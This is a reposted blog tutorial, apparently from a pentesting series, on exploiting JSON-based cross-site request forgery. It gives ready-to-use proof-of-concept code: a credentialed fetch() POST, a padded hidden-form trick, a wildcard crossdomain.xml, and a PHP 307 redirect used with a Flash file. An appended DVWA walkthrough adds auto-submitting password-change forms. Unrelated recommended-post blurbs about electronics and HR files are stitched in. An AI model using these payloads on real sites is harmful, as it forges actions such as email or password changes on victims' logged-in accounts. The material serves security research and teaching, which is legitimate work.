【CSRF技巧拓展】————4、Exploiting JSON Cross Site Request Forgery (CSRF) using Flash

于 2019-01-23 09:03:56 发布
阅读量319 收藏
点赞数
分类专栏: 【渗透测试拓展】 # CSRF技巧拓展

Update 2:

For the Case 1, there is possibility in some cases where server reject the request due to extra padding of data, but there is another and best way, using fetch or XHR request we can submit the json formatted data without any limitations, added poc code for the same.

Thanks to Prakash for making me aware of this.

Update 1:

Great work by Evgeniy who edited and compiled the Flash file in a way where users can pass all the information including JSON data, php file & target endpoint via URL parameter, which not only make all those complex procedures simpler but also remove the hectic task to recompilation of flash file each time for the Case 2.

Here is the the updated flash and other files by Evgeniy.

Hello Friends!

Everyone knows about basic csrf attack, if not just go through this owasp page and burp engagement tools have easiest option to create csrf proof of concept for all kind of basic csrf attack including performing csrf via xhr request.

in this post i’m going to talk about csrf scenarios which i encountered many times and seen many researchers from community are curious about it, so i will try clear as much possible!

so this trick comes into play when post request data formatted into json format, eg: {“name”:”test”, “email”:”victim.com”}, which have 2 scenario.

CASE 1:

  • Server looking for json formatted data but don’t validate the Content-type

CASE 2:

  • Server looking for json formatted data and validate the Content-type as well, i.e application/json

Note: This csrf attack only works when the application do only rely either on json formatted data or Content-type application/json, and data format check, if there is any additional csrf token/referer check at place this will not work.

Exploiting Case 1:

This can be achieved with little HTML trick using name attribute with padding some extra data, simply can be done using Fetch request, as we know in this case server is only checking for the post data if it’s correctly formatted or not, if yes it will accept the request regardless the Content-type is set as text/plain

Now assume we have to submit this test data to the vulnerable application: {“name”:”attacker”,”email”:”attacker@gmail.com”}

Updated method: 

<title>JSON CSRF POC</title>
<body>
<center>
<h1> JSON CSRF POC </h1>
<script>
fetch('http://vul-app.com', {method: 'POST', credentials: 'include', headers: {'Content-Type': 'text/plain'}, body: '{"name":"attacker","email":"attacker.com"}'});
</script>
<form action="#">
<input type="button" value="Submit" />
</form>
</center>
</body>
</html>

Source: http://research.rootme.in/forging-content-type-header-with-flash

Old Method: 

<html>
<title>JSON CSRF POC</title>
<center>
<h1> JSON CSRF POC </h1>
<form action=http://vul-app.com method=post enctype="text/plain" >
<input name='{"name":"attacker","email":"attacker@gmail.com","ignore_me":"' value='test"}'type='hidden'>
<input type=submit value="Submit">
</form>
</center>
</html>

This will make post request with valid json formatted data with padding some extra data, if the application don’t care about extra data which happened in most of cases i seen. if not, there is always 2nd way to use.

Source: http://blog.opensecurityresearch.com/2012/02/json-csrf-with-parameter-padding.html

Exploiting Case 2:

Here even if application is validating the Content-type and data format, this attack can be achieved using flash and 307 redirect.

Requirements:

  1. Crafted Flash file
  2. Crossdomain XML file
  3. PHP file with 307 status code

CRAFTED FLASH FILE:

This flash (.swf) file have our json formatted data which attacker have to post on the target application, and link to hosted php file in it.

Here is the test SWF file, you can download and edit the contents as per your need, i do use FFDec on Windows for editing and compiling the flash file, you can check others based on your environment.

CROSSDOMAIN XML FILE:

<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
<allow-http-request-headers-from domain="*" headers="*" secure="false"/>
</cross-domain-policy>

This file should be hosted on attackers website’s root directory, so flash file can make request to attacker’s host.
Note: You don’t need crossdomain file if  flash file & redirector page is on same domain.

PHP FILE WITH 307 STATUS CODE:

<?php

// redirect automatically

header("Location: https://victim.com/user/endpoint/", true, 307);

?>

Flash file request for this php file, this will make 307 redirect to mentioned application endpoint, and as 307 is special redirect which will post the JSON data as well which got received from the flash file to the target endpoint and CSRF will take place successfully.

Here is the public report #44146 by @avlidienbrunn for the same.

Note: As this is based on flash, so flash should be installed in browser to make it work, which is very normal for now but may not be in future.

do let me know if you have any queries in comment section or tweet about it here , and thanks to Parth for the proof reading.

 

CSRF(英语:Cross-site request forgery)浅析.md
01-26
CSRF(英语:Cross-site request forgery)浅析.md
csrf绕过Referer技巧-01
09-15
CSRF(Cross-Site Request Forgery,跨站请求伪造)是一种常见的Web攻击方式,攻击者可以通过构造恶意页面诱骗用户执行非法操作。为了防御CSRF攻击,Web开发者通常会使用Referer头来判断请求的来源是否合法。本文将...
CSRF漏洞挖掘技巧20200428.docx
04-28
本文主要探讨了CSRF漏洞的挖掘技巧、测试方法以及修复策略。 1. 漏洞描述 CSRF攻击的关键在于攻击者能够诱导受害者在不知情的情况下,执行对受害者的账户有影响的HTTP请求。攻击者可能利用站内或站外的资源,比如...
LTspice仿真:LDO电源电路学习与实践的利器
04-04
内容概要:本文详细介绍了如何利用LTspice进行LDO(低压差线性稳压器)电源电路的仿真。首先讲解了如何导入LDO模型并配置仿真环境,接着深入探讨了瞬态分析、相位裕度、电源抑制比(PSRR)等关键仿真的具体步骤和注意事项。文中提供了多个实用的操作技巧,如通过调整补偿电容优化相位裕度,以及使用.step param命令批量测试不同参数的影响。此外,还分享了一些常见的仿真误区及其解决方法,帮助读者更好地理解和掌握LDO的设计与调试。 适合人群:电子工程专业学生、电源电路设计初学者、希望深入了解LDO特性的工程师。 使用场景及目标:适用于希望通过仿真工具提高LDO设计技能的人群。主要目标是掌握LDO的基本工作原理,学会使用LTspice进行各种类型的仿真分析,从而优化电路设计,确保系统的稳定性和性能。 其他说明:文章不仅提供详细的仿真步骤和技术细节,还附带了作者的实际经验和常见问题解决方案,使读者能够在实践中不断改进自己的设计思路。
渝安集团员工职业发展通道设计方案.ppt
04-04
渝安集团员工职业发展通道设计方案.ppt
新能源电动汽车VCU与BMS的HIL硬件在环仿真技术及其模块化建模
04-04
内容概要:本文详细介绍了新能源电动汽车中VCU(整车控制器)和BMS(电池管理系统)的HIL(硬件在环)仿真技术。首先阐述了整车建模的基础,包括电池、电机等关键部件的建模要点。接着分别解析了驾驶员模块、仪表模块、BCU整车控制器模块、MCU电机模块、TCU变速箱模块、BMS电池管理模块等多个子模块的功能和实现方式。最后强调了HIL仿真在电动汽车控制系统测试和优化中的重要性,特别是在降低成本和风险方面的作用。 适合人群:从事新能源汽车研发的技术人员,尤其是专注于VCU和BMS领域的工程师。 使用场景及目标:适用于需要深入了解电动汽车控制系统仿真技术的研发团队,在产品开发初期进行系统测试和优化,确保各子系统间的协同工作正常。 其他说明:文中提供了大量代码示例,帮助读者更好地理解和实践相关概念和技术细节。此外,还分享了一些实际项目中的经验和教训,如故障注入测试的具体应用场景等。
如何应对一线人员春节后的离职潮.docx
04-04
如何应对一线人员春节后的离职潮
线性代数_GitHub_课件作业_教学辅助用途_1742837800.zip
04-04
线性代数
离职面谈表.xls
04-04
离职面谈表.xls
聚宽对接qmt大礼包,帮助你配置好交易实盘环境
最新发布
04-04
聚宽对接qmt大礼包,配备需要的全部软件:python3.9版本,qmt模拟安装包,pycharm安装包,talib包
试用期转正表.xls
04-04
试用期转正表.xls
招聘数据分析.xls
04-04
招聘数据分析.xls
如何让新员工快速融入团队.docx
04-04
如何让新员工快速融入团队
电力电子仿真中并离网逆变器及无功补偿设备的控制策略与建模
04-04
内容概要:本文详细介绍了并离网逆变器的两种主要控制策略——PQ控制和V/f控制,以及无功能量发生器(SVG)和有源电力滤波器(APF)的仿真模型。对于PQ控制,文章展示了如何将功率指令转化为电流指令,并强调了电网电压定向和限幅处理的重要性。V/f控制则用于离网模式,通过调节电压和频率来维持系统的稳定。SVG主要用于无功补偿,通过实时计算无功需求进行补偿。APF则专注于谐波检测和消除,利用自适应滤波器提高效率。此外,文中还提供了多个实用的小技巧,如仿真步长设置、模式切换时的前馈补偿等。 适合人群:从事电力电子仿真研究的技术人员,尤其是对逆变器控制策略感兴趣的工程师。 使用场景及目标:适用于需要深入理解和实现逆变器控制策略的研究项目,帮助工程师优化仿真模型,提升系统性能,确保仿真结果的准确性。 其他说明:文章不仅提供了详细的代码片段,还分享了许多实践经验,有助于读者避免常见错误,提高仿真成功率。
Carsim与Simulink联合仿真中基于线性二自由度模型的卡尔曼滤波(KF)实现及优化
04-04
内容概要:本文详细介绍了如何利用Carsim与Simulink进行联合仿真,通过线性二自由度模型和卡尔曼滤波(KF)来估计车辆的质心侧偏角和横摆角速度。首先搭建了联合仿真框架,Carsim提供车辆状态量,Simulink负责算法处理。文中展示了线性二自由度模型的状态方程及其参数设定,并深入探讨了KF的两种实现方式:S函数编程和Simulink内置模块。对于S函数实现,着重讲解了状态转移矩阵的动态更新以及噪声矩阵Q的调整策略,确保模型能够适应车速变化。而对于内置模块,则指出了其在灵活性方面的不足之处。此外,还讨论了联合仿真的配置要点,如数据接口同步、采样时间和信号处理等问题。 适合人群:从事车辆动力学研究、控制理论应用、自动化控制领域的工程师和技术人员。 使用场景及目标:适用于需要精确估计车辆质心侧偏角和横摆角速度的研究和开发项目,特别是在涉及ESP等主动安全系统的开发过程中。目标是提高估计精度,增强系统的鲁棒性和响应速度。 其他说明:文章提供了详细的代码片段和实践经验分享,帮助读者更好地理解和实施相关技术。建议在实际应用中根据具体需求选择合适的KF实现方式,并注意处理各种边界条件和异常情况。
档案管理[03].pptx
04-04
档案管理[03]
风电与储能联合调频系统:基于Python的建模与优化
04-04
内容概要:本文详细介绍了风电与储能联合调频系统的原理及其优化方法。首先解释了风电输出功率的波动性和对电网频率的影响,提出储能系统作为解决方案。文中展示了如何用Python生成风速数据并构建调频控制系统,重点讨论了PID控制器的设计以及SOC(荷电状态)管理策略。此外,还探讨了调频控制逻辑、硬件在环测试、风电功率预测模型(如LSTM)、调频效果验证方法及储能系统的物理限制等问题。最后强调了模型验证的重要性,提出了异常数据注入测试的方法。 适合人群:从事电力系统自动化、新能源发电及储能技术研发的专业人士,尤其是有一定编程基础的研究人员和技术工程师。 使用场景及目标:适用于需要理解和实施风电与储能联合调频项目的团队。主要目标是提高电网稳定性,减少风电波动带来的负面影响,同时延长储能系统的使用寿命。 其他说明:文中提供了大量实用的Python代码示例,涵盖了从数据生成到控制逻辑实现再到模型验证的全过程。对于希望深入理解风储调频系统的工作机制和技术挑战的人来说,是一份非常有价值的参考资料。
dvwa靶场csrf
12-29
### DVWA CSRF Vulnerability Walkthrough and Explanation #### Understanding CSRF in DVWA Cross-Site Request Forgery (CSRF) is a type of attack that tricks the victim into submitting a malicious request. It forces an end user to execute unwanted actions on a web application in which they are authenticated[^1]. In DVWA, this vulnerability can be explored at different difficulty levels including Low, Medium, High, and Impossible. For the **Low level**, no token or any form of validation exists. An attacker could craft a simple HTML page with hidden fields mimicking the target's POST data structure: ```html <form action="http://192.168.112.188/dvwa/vulnerabilities/csrf/" method="POST"> <input type="hidden" name="password_new" value="hacked"/> <input type="hidden" name="password_confirm" value="hacked"/> <input type="submit" value="Change Password"/> </form> <script>document.forms[0].submit();</script> ``` At the **Medium level**, although there might not be strict anti-CSRF tokens implemented, other defenses such as checking HTTP referer headers may apply. However, these checks often prove insufficient against sophisticated attacks because attackers can manipulate browser behavior through various means like embedding images pointing to internal URLs within external pages[^2]. In more advanced scenarios—like those found under 'High' settings—the presence of unique per-session tokens makes exploitation significantly harder but still possible via techniques involving session fixation or exploiting XSS flaws elsewhere on the site. The ultimate goal when configuring security measures should always aim towards achieving what DVWA terms "Impossible". Here, comprehensive protections prevent successful forgery attempts by ensuring each legitimate operation includes unpredictable values tied directly back to individual sessions. #### Demonstrating Exploitation Process To demonstrate how one exploits CSRF vulnerabilities present in lower difficulties using DVWA: - Create an HTML file named `change_password.html` containing crafted forms targeting password change functionality. ```html <!-- Example for low-level CSRF --> <!DOCTYPE html> <html lang="en"> <head><title>Exploit Page</title></head> <body onload='document.getElementById("csrf").submit()'> <form id="csrf" action="http://target-ip-address/dvwa/vulnerabilities/csrf/" method="POST"> <input type="text" name="password_new" value="newpass"/> <input type="text" name="password_confirm" value="newpass"/> <input type="submit" name="Change" /> </form> </body> </html> ``` Upon loading this exploit page while logged into DVWA, it automatically submits the form changing your account’s credentials without explicit consent from you. #### Mitigation Strategies Against CSRF Attacks Implementing robust countermeasures involves several best practices: - Utilizing synchronized cookie patterns where requests must include both cookies and matching parameters sent along with them. - Generating cryptographically secure random numbers used once per transaction known as synchronizer tokens stored server-side during login then validated upon submission. - Employing double submit cookies strategy wherein clients send two copies of their session identifier – one inside standard Cookie header another explicitly included among submitted variables. --related questions-- 1. What specific mechanisms does DVWA implement across its varying CSRF challenge complexities? 2. How do modern frameworks address potential CSRF threats beyond traditional methods discussed here? 3. Can machine learning algorithms enhance detection rates for novel types of cross-site scripting attacks related to CSRF? 4. Are there real-world examples demonstrating effective bypasses around contemporary anti-CSRF implementations?
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值